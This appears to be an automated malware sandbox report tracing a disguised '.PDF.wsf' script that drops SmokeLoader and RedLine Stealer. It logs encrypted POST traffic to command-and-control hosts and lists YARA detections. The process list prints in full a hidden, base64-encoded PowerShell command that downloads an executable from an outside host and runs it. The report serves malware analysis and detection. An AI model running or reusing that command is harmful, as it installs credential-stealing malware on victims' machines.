                                                                                                                          Connection: close
                                                                                                                          Data Raw: 31 61 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED]
                                                                                                                          Data Ascii: 1a2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at unicexpertmagazine.pw Port 80</address></body></html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.2.1049711188.40.141.211803968C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 4, 2024 15:11:01.482055902 CEST289OUTPOST /index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://gspupvuevfny.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 145
                                                                                                                          Host: ceoconstractionstore.pl
                                                                                                                          Oct 4, 2024 15:11:01.482085943 CEST145OUTData Raw: a1 5f 7c 5e 85 4a 2c cb c0 4d a7 b7 fd c9 2f 49 5c 33 ce 29 60 c0 43 23 a1 54 ca 6f 71 8f 03 5d ba 56 d8 fe 3d a5 00 38 5e b9 cd 07 a8 44 1c 4d a6 60 28 1e cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be a6 09 60 a0
                                                                                                                          Data Ascii: _|^J,M/I\3)`C#Toq]V=8^DM`(2m-^JrC)`zuEC|x./1,~l%*oxtiC"
                                                                                                                          Oct 4, 2024 15:11:02.320158005 CEST151INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.18.0
                                                                                                                          Content-Length: 7
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Date: Fri, 04 Oct 2024 13:11:02 GMT
                                                                                                                          Data Raw: 03 00 00 00 7d 4f d6
                                                                                                                          Data Ascii: }O
                                                                                                                          Oct 4, 2024 15:11:02.326832056 CEST289OUTPOST /index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://nqgjgifqepqt.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 368
                                                                                                                          Host: ceoconstractionstore.pl
                                                                                                                          Oct 4, 2024 15:11:02.326869965 CEST368OUTData Raw: a1 5f 7c 5e 85 4a 2c cb c0 4d a7 b7 fd c9 2f 49 5c 33 ce 29 60 c0 43 23 a1 54 ca 6f 71 8f 03 5d ba 56 d8 fe 3d a5 00 38 5e b9 cd 07 a8 44 1c 4d a6 60 28 1e cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 1b 1d bc ca bf 4a 73 43 29 be 9a 3f 75 b9
                                                                                                                          Data Ascii: _|^J,M/I\3)`C#Toq]V=8^DM`(2m-^JsC)?uuZ?;aa.\[f#I%7Q%cz(dh}[bWLk-byX8H/QsJI'^nU9[1kH5U]gv/}Kp]D*
                                                                                                                          Oct 4, 2024 15:11:02.529197931 CEST144INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.18.0
                                                                                                                          Content-Length: 0
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Date: Fri, 04 Oct 2024 13:11:02 GMT
                                                                                                                          Oct 4, 2024 15:11:28.365392923 CEST292OUTPOST /index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://xcltdjfoaardilo.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 362
                                                                                                                          Host: ceoconstractionstore.pl
                                                                                                                          Oct 4, 2024 15:11:28.365392923 CEST362OUTData Raw: a1 5f 7c 5e 85 4a 2c cb c0 4d a7 b7 fd c9 2f 49 5c 33 ce 29 60 c0 43 23 a1 54 ca 6f 71 8f 03 5d ba 56 d8 fe 3d a5 00 38 5e b9 cd 07 a8 44 1c 4d a6 60 28 1e cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be bf 5f 24 ce
                                                                                                                          Data Ascii: _|^J,M/I\3)`C#Toq]V=8^DM`(2m-^JrC)_$m_QkQt`+5+WB~(?F8e^-yFA@}ji#P:x@hhK:Grqe#DZWOf'6NGbf@0,W}(2ZX
                                                                                                                          Oct 4, 2024 15:11:28.558135033 CEST151INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.18.0
                                                                                                                          Content-Length: 7
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Date: Fri, 04 Oct 2024 13:11:28 GMT
                                                                                                                          Data Raw: 03 00 00 00 7d 4f d6
                                                                                                                          Data Ascii: }O
                                                                                                                          Oct 4, 2024 15:11:28.563607931 CEST291OUTPOST /index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://ebsdyhoseklppw.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 366
                                                                                                                          Host: ceoconstractionstore.pl
                                                                                                                          Oct 4, 2024 15:11:28.563641071 CEST366OUTData Raw: a1 5f 7c 5e 85 4a 2c cb c0 4d a7 b7 fd c9 2f 49 5c 33 ce 29 60 c0 43 23 a1 54 ca 6f 71 8f 03 5d ba 56 d8 fe 3d a5 00 38 5e b9 cd 07 a8 44 1c 4d a6 60 28 1e cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 1b 1d bc ca bf 4a 73 43 29 be ee 04 39 c2
                                                                                                                          Data Ascii: _|^J,M/I\3)`C#Toq]V=8^DM`(2m-^JsC)9\^:Vn" 'ZeX,$1.P7t}oWB"dd/Alf9earH-HdJv$sMb$-p%{TyLQb=,w
                                                                                                                          Oct 4, 2024 15:11:28.773679018 CEST144INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.18.0
                                                                                                                          Content-Length: 0
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Date: Fri, 04 Oct 2024 13:11:28 GMT


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          3192.168.2.1049713193.46.217.78803968C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 4, 2024 15:11:27.253731966 CEST290OUTPOST /index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://biegpmdfbwuaocv.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 226
                                                                                                                          Host: unicexpertmagazine.pw
                                                                                                                          Oct 4, 2024 15:11:27.253731966 CEST226OUTData Raw: a1 5f 7c 5e 85 4a 2c cb c0 4d a7 b7 fd c9 2f 49 5c 33 ce 29 60 c0 43 23 a1 54 ca 6f 71 8f 03 5d ba 56 d8 fe 3d a5 00 38 5e b9 cd 07 a8 44 1c 4d a6 60 28 1e cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be e7 27 40 bd
                                                                                                                          Data Ascii: _|^J,M/I\3)`C#Toq]V=8^DM`(2m-^JrC)'@V|I:m+}_=KXSfGrdG:SEuW@?DsNlpl|W>YvW?qC~55PbDp4=9x|
                                                                                                                          Oct 4, 2024 15:11:28.362041950 CEST602INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.18.0
                                                                                                                          Date: Fri, 04 Oct 2024 13:11:28 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 31 61 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED]
                                                                                                                          Data Ascii: 1a2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at unicexpertmagazine.pw Port 80</address></body></html>0


                                                                                                                          Click to jump to process

                                                                                                                          Click to jump to process

                                                                                                                          Click to dive into process behavior distribution

                                                                                                                          Click to jump to process

                                                                                                                          Target ID:0
                                                                                                                          Start time:09:10:20
                                                                                                                          Start date:04/10/2024
                                                                                                                          Path:C:\Windows\System32\wscript.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\3312.PDF.wsf"
                                                                                                                          Imagebase:0x7ff72f680000
                                                                                                                          File size:170'496 bytes
                                                                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:2
                                                                                                                          Start time:09:10:22
                                                                                                                          Start date:04/10/2024
                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=
                                                                                                                          Imagebase:0x7ff7fc0b0000
                                                                                                                          File size:289'792 bytes
                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:3
                                                                                                                          Start time:09:10:22
                                                                                                                          Start date:04/10/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff620390000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:4
                                                                                                                          Start time:09:10:22
                                                                                                                          Start date:04/10/2024
                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=
                                                                                                                          Imagebase:0x7ff7b2bb0000
                                                                                                                          File size:452'608 bytes
                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:5
                                                                                                                          Start time:09:10:30
                                                                                                                          Start date:04/10/2024
                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\oBuf.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\oBuf.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:222'720 bytes
                                                                                                                          MD5 hash:31059E7394B880F017E83804D9B716AB
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.1659047327.000000000090D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.1658821304.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.1658821304.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.1658888908.00000000006D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.1658888908.00000000006D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.1658776261.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 100%, Avira
                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                          • Detection: 82%, ReversingLabs
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Target ID:9
                                                                                                                          Start time:09:10:40
                                                                                                                          Start date:04/10/2024
                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                                                          Imagebase:0x7ff609fd0000
                                                                                                                          File size:5'141'208 bytes
                                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.2697683211.0000000008821000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.2697683211.0000000008821000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.2692065809.0000000000B21000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.2692065809.0000000000B21000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          Target ID:10
                                                                                                                          Start time:09:11:00
                                                                                                                          Start date:04/10/2024
                                                                                                                          Path:C:\Users\user\AppData\Roaming\wbfgshs
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\user\AppData\Roaming\wbfgshs
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:222'720 bytes
                                                                                                                          MD5 hash:31059E7394B880F017E83804D9B716AB
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000A.00000002.1937502143.00000000007ED000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000A.00000002.1937393700.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000002.1937588498.0000000002181000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000A.00000002.1937588498.0000000002181000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000002.1937415520.00000000007C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000A.00000002.1937415520.00000000007C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 100%, Avira
                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                          • Detection: 82%, ReversingLabs
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Reset < >
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.1608490232.00007FF7C1460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_7ff7c1460000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a048f585bed63dc66490ecb16b37e362339eab38e6eec9cc3de248283f446183
                                                                                                                            • Instruction ID: 3bb7d45b924fed962887c70807c0d7cdd223aa1c782d07f2c3a903ea2dc2fc9e
                                                                                                                            • Opcode Fuzzy Hash: a048f585bed63dc66490ecb16b37e362339eab38e6eec9cc3de248283f446183
                                                                                                                            • Instruction Fuzzy Hash: 90E128A190DBC54FE35AAB385C552B8BBE0EF53225B4802FED449C71D3D958AD06C362
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.1608490232.00007FF7C1460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_7ff7c1460000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 85f55ec3a81c59bd56774571e042acfffa0e4a9ae7fa831fec3461f572d0859c
                                                                                                                            • Instruction ID: a516634f0e955bbc15b1b33a49babeed9ee0b4c25b668cf8ea695b378b5b4133
                                                                                                                            • Opcode Fuzzy Hash: 85f55ec3a81c59bd56774571e042acfffa0e4a9ae7fa831fec3461f572d0859c
                                                                                                                            • Instruction Fuzzy Hash: E92104A2F0EB4A0FE3A9AF2818551B8B2D1EF4123AB9801BAC00DC7597DD59ED458251
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.1608048171.00007FF7C1390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1390000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_7ff7c1390000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5379a3d0cc0fb09bd91c3ab90250569a57e3f174540120ef3e8124296d8366fc
                                                                                                                            • Instruction ID: 551dfffefa41502465fafc7f307ba1f470a6a250eeb5820597d09e55abd2a2d6
                                                                                                                            • Opcode Fuzzy Hash: 5379a3d0cc0fb09bd91c3ab90250569a57e3f174540120ef3e8124296d8366fc
                                                                                                                            • Instruction Fuzzy Hash: E101A77020CB0C4FDB44EF0CE451AB6B3E0FB85364F10052DE58AC3651DA36E882CB41

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:8.5%
                                                                                                                            Dynamic/Decrypted Code Coverage:19.9%
                                                                                                                            Signature Coverage:49.4%
                                                                                                                            Total number of Nodes:156
                                                                                                                            Total number of Limit Nodes:6
                                                                                                                            execution_graph 4184 6a092b GetPEB 4185 6a0972 4184->4185 4090 402e42 4094 402e47 4090->4094 4091 402f4c 4092 402f18 4092->4091 4093 401902 8 API calls 4092->4093 4093->4091 4094->4091 4094->4092 4095 4020ea NtQuerySystemInformation 4094->4095 4095->4092 4249 418986 4250 418990 4249->4250 4251 418940 SetPriorityClass 4250->4251 4252 4189ad 4250->4252 4251->4250 4198 40190e 4199 401912 4198->4199 4200 4018b5 4198->4200 4201 401946 Sleep 4199->4201 4202 401961 4201->4202 4203 401529 7 API calls 4202->4203 4204 401972 4202->4204 4203->4204 3963 418ed0 3966 418a70 3963->3966 3965 418ed5 3967 418a7d 3966->3967 3968 418b80 7 API calls 3967->3968 3969 418cc6 3967->3969 3971 418bf8 7 API calls 3968->3971 3970 418cd4 SetCommState 3969->3970 3976 418ced 3969->3976 3970->3969 3972 418ca4 3971->3972 3973 418c98 ObjectPrivilegeAuditAlarmW 3971->3973 3974 418cb5 3972->3974 3975 418cad WaitForSingleObject 3972->3975 3973->3972 3974->3969 3975->3974 3977 418daa 3976->3977 3978 418cfa 9 API calls 3976->3978 3990 418740 LocalAlloc 3977->3990 3985 418d88 3978->3985 3982 418daf LoadLibraryA 3991 418770 GetModuleHandleW GetProcAddress VirtualProtect 3982->3991 3983 418dfd 3992 4189d0 3983->3992 3985->3977 3986 418e02 3987 418e43 InterlockedCompareExchange 3986->3987 3988 418e23 MoveFileW 3986->3988 3989 418e5d 3986->3989 3987->3986 3988->3986 3989->3965 3990->3982 3991->3983 3993 4189f9 QueryDosDeviceW 3992->3993 3994 418a0a 3992->3994 3993->3994 4003 418910 3994->4003 3997 418a25 4006 418950 3997->4006 3998 418a1d FreeEnvironmentStringsA 3998->3997 4001 418a57 4001->3986 4002 418a3c HeapCreate GetNumaProcessorNode 4002->4001 4004 418921 FatalAppExitA GetModuleHandleA 4003->4004 4005 418933 4003->4005 4004->4005 4005->3997 4005->3998 4007 41896c 4006->4007 4008 41895e BuildCommDCBA 4006->4008 4009 418974 FreeEnvironmentStringsA 4007->4009 4012 41897c 4007->4012 4008->4012 4009->4012 4010 4189ad 4010->4001 4010->4002 4012->4010 4013 418940 4012->4013 4016 4188c0 4013->4016 4017 4188eb 4016->4017 4018 4188dc SetPriorityClass 4016->4018 4017->4012 4018->4017 4019 6a003c 4020 6a0049 4019->4020 4032 6a0e0f SetErrorMode SetErrorMode 4020->4032 4025 6a0265 4026 6a02ce VirtualProtect 4025->4026 4028 6a030b 4026->4028 4027 6a0439 VirtualFree 4031 6a04be LoadLibraryA 4027->4031 4028->4027 4030 6a08c7 4031->4030 4033 6a0223 4032->4033 4034 6a0d90 4033->4034 4035 6a0dad 4034->4035 4036 6a0dbb GetPEB 4035->4036 4037 6a0238 VirtualAlloc 4035->4037 4036->4037 4037->4025 4038 90ff46 4039 90ff4a 4038->4039 4041 90ff56 4038->4041 4042 90ff57 4039->4042 4043 90ff66 4042->4043 4046 9106f7 4043->4046 4047 910712 4046->4047 4048 91071b CreateToolhelp32Snapshot 4047->4048 4049 910737 Module32First 4047->4049 4048->4047 4048->4049 4050 910746 4049->4050 4051 90ff6f 4049->4051 4053 9103b6 4050->4053 4051->4041 4054 9103e1 4053->4054 4055 9103f2 VirtualAlloc 4054->4055 4056 91042a 4054->4056 4055->4056 4102 4014db 4103 401469 4102->4103 4104 40148f 4102->4104 4104->4102 4104->4103 4105 4015d5 NtDuplicateObject 4104->4105 4105->4103 4106 4015f2 NtCreateSection 4105->4106 4107 401672 NtCreateSection 4106->4107 4108 401618 NtMapViewOfSection 4106->4108 4107->4103 4110 40169e 4107->4110 4108->4107 4109 40163b NtMapViewOfSection 4108->4109 4109->4107 4111 401659 4109->4111 4110->4103 4112 4016a8 NtMapViewOfSection 4110->4112 4111->4107 4112->4103 4113 4016cf NtMapViewOfSection 4112->4113 4113->4103 4209 401922 4210 401930 4209->4210 4211 401946 Sleep 4210->4211 4212 401961 4211->4212 4213 401529 7 API calls 4212->4213 4214 401972 4212->4214 4213->4214 4231 401534 4232 401546 4231->4232 4233 4015d5 NtDuplicateObject 4232->4233 4240 4016f1 4232->4240 4234 4015f2 NtCreateSection 4233->4234 4233->4240 4235 401672 NtCreateSection 4234->4235 4236 401618 NtMapViewOfSection 4234->4236 4238 40169e 4235->4238 4235->4240 4236->4235 4237 40163b NtMapViewOfSection 4236->4237 4237->4235 4239 401659 4237->4239 4238->4240 4241 4016a8 NtMapViewOfSection 4238->4241 4239->4235 4241->4240 4242 4016cf NtMapViewOfSection 4241->4242 4242->4240 4057 402ffa 4058 403024 4057->4058 